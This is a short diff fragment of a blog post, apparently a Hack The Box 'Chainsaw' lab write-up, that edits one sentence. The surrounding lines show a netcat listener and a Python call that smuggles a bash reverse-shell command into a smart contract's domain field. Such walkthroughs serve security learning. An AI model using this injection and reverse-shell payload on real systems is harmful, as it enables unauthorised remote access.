defarbs/defarbs.github.io/_posts/2019-11-23-htb-chainsaw.md

 nc -lnvp 9001
 ```

-And then proceeded to obtain a shell on that port with this command in my `python` session:
+I then proceeded to obtain a shell on that port with this command in my `python` session:

 ```python
 +>>> contract.functions.setDomain("10.10.14.34; bash -c 'bash -i >& /dev/tcp/10.10.14.34/9001 0>&1'").transact()